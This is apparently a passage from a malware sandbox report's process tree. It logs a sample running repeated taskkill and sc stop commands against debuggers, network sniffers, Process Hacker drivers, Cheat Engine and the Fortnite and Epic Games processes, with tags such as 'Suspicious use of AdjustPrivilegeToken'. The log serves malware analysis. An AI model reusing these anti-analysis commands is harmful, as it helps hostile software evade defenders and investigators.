- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2928
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:260
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4868
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1820
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:5068
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2244
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3892
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2252
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:5092
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:5112
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1608
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1924
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1996
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2732
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
  2⤵
  PID:528
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq die*" /IM * /F /T
    3⤵
    PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3300
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3524
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
  2⤵
  PID:4352
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebugger.exe
    3⤵
    PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:3312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
  2⤵
  PID:4904
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FolderChangesView.exe
    3⤵
    PID:3660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2864
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
  2⤵
  PID:1564
- - C:\Windows\system32\sc.exe
    sc stop HttpDebuggerSdk
    3⤵
    - Launches sc.exe
    PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4908
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:2136
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3388
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1172
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3928
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3076
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2356
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4992
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Kills process with taskkill
    PID:4316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4064
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2204
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:2920
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:3232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4900
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:984
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4272
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1552
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4984
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2496
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3588
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:396
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:2072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2408
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1292
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:3676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4788
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3700
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4184
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:400
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1464
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3052
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4536
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1500
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2488
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3340
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2252
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:3860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3024
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1124
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:5084
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4160
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:524
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:528
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2088
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:744
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:4788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1356
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4924
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:632
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2608
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4356
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1284
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:852
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4616
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
  2⤵
  PID:1244
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerProSdk
    3⤵
    - Launches sc.exe
    PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:3312
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3524
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:2136
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:4368
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:1172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:3528
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4940
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1904
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1828
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3084
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3324
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1456
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2188
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:564
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4460
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2604
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3800
